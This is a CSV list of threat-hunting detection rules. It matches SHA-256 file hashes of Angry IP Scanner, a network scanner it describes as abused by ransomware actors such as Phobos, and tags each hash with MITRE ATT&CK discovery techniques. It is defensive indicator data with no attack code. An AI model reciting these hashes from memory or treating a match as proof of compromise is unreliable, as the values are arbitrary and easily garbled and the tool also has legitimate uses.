"*6c514ecc4155806aef7eb0a913cf4a88214e20bdd69694ad9ac5c565d588dea9*",".{0,1000}6c514ecc4155806aef7eb0a913cf4a88214e20bdd69694ad9ac5c565d588dea9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*6c9c712e0274ee0e79c0b61f59b8bab9670afc69b905c987c6648da76220abab*",".{0,1000}6c9c712e0274ee0e79c0b61f59b8bab9670afc69b905c987c6648da76220abab.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*6d9f0234c1022ad90c0ec7837dce7d93df645d7aac58c6fc75a0ef71450d477d*",".{0,1000}6d9f0234c1022ad90c0ec7837dce7d93df645d7aac58c6fc75a0ef71450d477d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*6ddb4ce3d13cfc9003bd4351bfd6ce9ad25d3cabea52e9a7e7b9ac1ca0cd6605*",".{0,1000}6ddb4ce3d13cfc9003bd4351bfd6ce9ad25d3cabea52e9a7e7b9ac1ca0cd6605.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*6f12c2f6c1d43cc0cfdbd2f73917a227ebd507de82e3d45b6ca6de259ff89f0c*",".{0,1000}6f12c2f6c1d43cc0cfdbd2f73917a227ebd507de82e3d45b6ca6de259ff89f0c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*6f4ad87a95fda2c0a77122b77942d54f688b6a355f40b256578cf7e8c26cc5f1*",".{0,1000}6f4ad87a95fda2c0a77122b77942d54f688b6a355f40b256578cf7e8c26cc5f1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*717500a496b76ffa5205ed4dd9bd2ef79da659d75e1d8e98efb1b2ec8c224509*",".{0,1000}717500a496b76ffa5205ed4dd9bd2ef79da659d75e1d8e98efb1b2ec8c224509.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*71c807766303d5e102509a7209831660c1c947db0da3d3c1e3f9be5be5d5ceb3*",".{0,1000}71c807766303d5e102509a7209831660c1c947db0da3d3c1e3f9be5be5d5ceb3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*72cfa26b9ac9f6c0e9af071df88f52d526b6b1301ab1c3e7055416e059ba7926*",".{0,1000}72cfa26b9ac9f6c0e9af071df88f52d526b6b1301ab1c3e7055416e059ba7926.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*73857ff880d961978dc2b9d183462db429be5397341f2d2e8885c8807c0919e3*",".{0,1000}73857ff880d961978dc2b9d183462db429be5397341f2d2e8885c8807c0919e3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*73eb5215f2d0d3a768bceff7c385d7cc3cf2cd2d0f7e8b19ceedb9a5c8b35a05*",".{0,1000}73eb5215f2d0d3a768bceff7c385d7cc3cf2cd2d0f7e8b19ceedb9a5c8b35a05.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*74173938c4040e181f011e7e2f6cdb171244c84f96517d0392a7759bf7d72f12*",".{0,1000}74173938c4040e181f011e7e2f6cdb171244c84f96517d0392a7759bf7d72f12.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*74b61c34014cb422b0eee3c53b32cde42a911c53bdfe80e074546fb26376628b*",".{0,1000}74b61c34014cb422b0eee3c53b32cde42a911c53bdfe80e074546fb26376628b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*74fbccc09445b0aba5eeccf05da49fbfca37508e6ff7e271dff3f5e6d78341a6*",".{0,1000}74fbccc09445b0aba5eeccf05da49fbfca37508e6ff7e271dff3f5e6d78341a6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*75cb7ebd2e1f98eb7e97929ed659acbbd93b230bae532421a9b5f17ad13cdf86*",".{0,1000}75cb7ebd2e1f98eb7e97929ed659acbbd93b230bae532421a9b5f17ad13cdf86.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*762089017bf87803b74509640cd7affd14e56e96747cbccfa324c4f766379470*",".{0,1000}762089017bf87803b74509640cd7affd14e56e96747cbccfa324c4f766379470.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*769239f45299ec58cc7328bb467a8bd72ba5e3f37b73ebbaae6915c3460668c4*",".{0,1000}769239f45299ec58cc7328bb467a8bd72ba5e3f37b73ebbaae6915c3460668c4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*76ccaaf7c67797cd5a61ce1855f5d8119c00970383b5a0e138b919434c63a0ce*",".{0,1000}76ccaaf7c67797cd5a61ce1855f5d8119c00970383b5a0e138b919434c63a0ce.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7737f7230b1f09b12b877710b8add003b01c59d51ac734bedeb283ef686010e9*",".{0,1000}7737f7230b1f09b12b877710b8add003b01c59d51ac734bedeb283ef686010e9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*784e6ae14f95b6980d03543b36191595f5f4087f00bb7dd75086ac86c8148923*",".{0,1000}784e6ae14f95b6980d03543b36191595f5f4087f00bb7dd75086ac86c8148923.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*786b267fff4f1a5d826418d127432d495d21e25eb3261c0e6c9f2db18abc5962*",".{0,1000}786b267fff4f1a5d826418d127432d495d21e25eb3261c0e6c9f2db18abc5962.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*78ddbc63bc64a5f1dd67be4a5ef8ee94ec59c9492fabe3a2b96eb115f755be90*",".{0,1000}78ddbc63bc64a5f1dd67be4a5ef8ee94ec59c9492fabe3a2b96eb115f755be90.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7903eb393533b1ce51e527cae1ba3c4da6752f87d2717c3984b39228ce65a028*",".{0,1000}7903eb393533b1ce51e527cae1ba3c4da6752f87d2717c3984b39228ce65a028.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7a3c9d753d8905987a2cccdca22a3dc2e1002ea396574c44cd38688bd184c9e8*",".{0,1000}7a3c9d753d8905987a2cccdca22a3dc2e1002ea396574c44cd38688bd184c9e8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7ba37f26aaa4de6fa3f0b1d77eb2d6b0f14f7df9acc8bb7ff8837cddb8941fa7*",".{0,1000}7ba37f26aaa4de6fa3f0b1d77eb2d6b0f14f7df9acc8bb7ff8837cddb8941fa7.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7c826148232f2a27362b5da0e089ce532476f5dbf66d57a95bc1af88aaf890ad*",".{0,1000}7c826148232f2a27362b5da0e089ce532476f5dbf66d57a95bc1af88aaf890ad.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7ca86e21a7433649ab9a2adc49dcdd8a6a415969c16a4158bf32cb06dfa1f8a5*",".{0,1000}7ca86e21a7433649ab9a2adc49dcdd8a6a415969c16a4158bf32cb06dfa1f8a5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7e3a5a3901bc2af3a00c4c3e2296f0064778b5be47ae0d0b2eee7afb72d8b3d8*",".{0,1000}7e3a5a3901bc2af3a00c4c3e2296f0064778b5be47ae0d0b2eee7afb72d8b3d8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7e3dbba1c95060ddc7fe1bf52e869246a6923e9695aa8d724feb8c5c1a5f8e37*",".{0,1000}7e3dbba1c95060ddc7fe1bf52e869246a6923e9695aa8d724feb8c5c1a5f8e37.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7e7f92d6ff919fe8cbe63f2daa348d122339d1a0aac0883afcf799facd214810*",".{0,1000}7e7f92d6ff919fe8cbe63f2daa348d122339d1a0aac0883afcf799facd214810.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7eb68ed7e2a9ca4802a0988d2d41cf8b859c00b8add791c52a304f434120c5b1*",".{0,1000}7eb68ed7e2a9ca4802a0988d2d41cf8b859c00b8add791c52a304f434120c5b1.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*7fb420b5290c157897884e59a8a08988d5884f3fb586b557df48fe061b614b59*",".{0,1000}7fb420b5290c157897884e59a8a08988d5884f3fb586b557df48fe061b614b59.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*8007c76597a892e234a78716e7fd500ca28d278ade6e5d4de965b35c6fefc7fd*",".{0,1000}8007c76597a892e234a78716e7fd500ca28d278ade6e5d4de965b35c6fefc7fd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*8023ad4a809f53faf76bc6c9b200e50b8145c561b076f6817ce22ab8b16ac25e*",".{0,1000}8023ad4a809f53faf76bc6c9b200e50b8145c561b076f6817ce22ab8b16ac25e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*806238839177ab580463a61cc47e98ed9827f1bff3f9c501df53b51fecc84c16*",".{0,1000}806238839177ab580463a61cc47e98ed9827f1bff3f9c501df53b51fecc84c16.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*807d6097fa6f16777eb54bc3be9639757e3dba0ca57c2a9d6b6b699289163df3*",".{0,1000}807d6097fa6f16777eb54bc3be9639757e3dba0ca57c2a9d6b6b699289163df3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*81e30731b5eb8a1e704c146062efd856cbfd37ceba4874d5907f84ac7deb59c9*",".{0,1000}81e30731b5eb8a1e704c146062efd856cbfd37ceba4874d5907f84ac7deb59c9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*81f47f6cd4d534902c6d146c6cf8bcb7e50d2b7b04d7402268e952278293347a*",".{0,1000}81f47f6cd4d534902c6d146c6cf8bcb7e50d2b7b04d7402268e952278293347a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*83d5b44bdd3d37cf3bc76b3e9e433c947c7917fa6fe8522d2e4421fecdfaf987*",".{0,1000}83d5b44bdd3d37cf3bc76b3e9e433c947c7917fa6fe8522d2e4421fecdfaf987.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*83e5e64474d446fb7f612d21968e4826a23f008e00110b199b35896eeb9436b4*",".{0,1000}83e5e64474d446fb7f612d21968e4826a23f008e00110b199b35896eeb9436b4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*83eeacb73e1ba4d3eb4d91887fa338e27c3ec91e283d6cdf2522322449b5e8ab*",".{0,1000}83eeacb73e1ba4d3eb4d91887fa338e27c3ec91e283d6cdf2522322449b5e8ab.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*845b979d93d58f985c1b6e1153fcfc12732c4d28a02cbae528cf106e55cfb93a*",".{0,1000}845b979d93d58f985c1b6e1153fcfc12732c4d28a02cbae528cf106e55cfb93a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*87d71be6639e0c89794aec6646ca5894c4be239c61462b4a8e78548898c553e6*",".{0,1000}87d71be6639e0c89794aec6646ca5894c4be239c61462b4a8e78548898c553e6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*88d829d4560be8d3c7323523d84320910daec9354336166d0ebba78f24032819*",".{0,1000}88d829d4560be8d3c7323523d84320910daec9354336166d0ebba78f24032819.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*88e1851d5b2c7725bb5e2cd08a45077496d207d8e04b56b35b982d6e32846f20*",".{0,1000}88e1851d5b2c7725bb5e2cd08a45077496d207d8e04b56b35b982d6e32846f20.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0*",".{0,1000}892405573aa34dfc49b37e4c35b655543e88ec1c5e8ffb27ab8d1bbf90fc6ae0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*89928c5882095cfc598c9479d2f5e7d9a41c3581fc0fd447237d79a310c305cc*",".{0,1000}89928c5882095cfc598c9479d2f5e7d9a41c3581fc0fd447237d79a310c305cc.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*89b153d078008da7bf1d05f4f2f6a655f2757472a9275e2895b311d44dfcccbe*",".{0,1000}89b153d078008da7bf1d05f4f2f6a655f2757472a9275e2895b311d44dfcccbe.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*8b8c267ddc5eadfb6f8de8bf34fdcba33016bfad0111a38e804f328d4c8c07ba*",".{0,1000}8b8c267ddc5eadfb6f8de8bf34fdcba33016bfad0111a38e804f328d4c8c07ba.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*8c4f57209e64bf6c59a9199663c8a386fc03f893d7f05539fb0f9b4a73420918*",".{0,1000}8c4f57209e64bf6c59a9199663c8a386fc03f893d7f05539fb0f9b4a73420918.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*8d0b5ca232aa2109cf7fbc5a1c046d1836d4554e8a572eb41f8967f15ca7aa91*",".{0,1000}8d0b5ca232aa2109cf7fbc5a1c046d1836d4554e8a572eb41f8967f15ca7aa91.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*8f0b8c0bc95134a4de6b0e1843e4f06f895a86778eaf0ec4de037827e14a75ff*",".{0,1000}8f0b8c0bc95134a4de6b0e1843e4f06f895a86778eaf0ec4de037827e14a75ff.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*8f72c5927a494dd87792908f62fbe8860e2f0c10c1ff1f622c5a484fcd78ad2e*",".{0,1000}8f72c5927a494dd87792908f62fbe8860e2f0c10c1ff1f622c5a484fcd78ad2e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*8faa1748975d3557974c240d1f30bfc6f100a4ec3a9c2f405c0814dfd45fe384*",".{0,1000}8faa1748975d3557974c240d1f30bfc6f100a4ec3a9c2f405c0814dfd45fe384.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*905332f37ef23c8e8313a76e89ef3388329427c9136de626ae4f7cc5876c584e*",".{0,1000}905332f37ef23c8e8313a76e89ef3388329427c9136de626ae4f7cc5876c584e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*92c11dc911a2dd27aab2a607f55135cfe30da9fe68d3604b2efd798faf640a76*",".{0,1000}92c11dc911a2dd27aab2a607f55135cfe30da9fe68d3604b2efd798faf640a76.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*932c73eab9396ea8804470d3877d844f29c2e45ea3826792e3fd40e2c455b34c*",".{0,1000}932c73eab9396ea8804470d3877d844f29c2e45ea3826792e3fd40e2c455b34c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
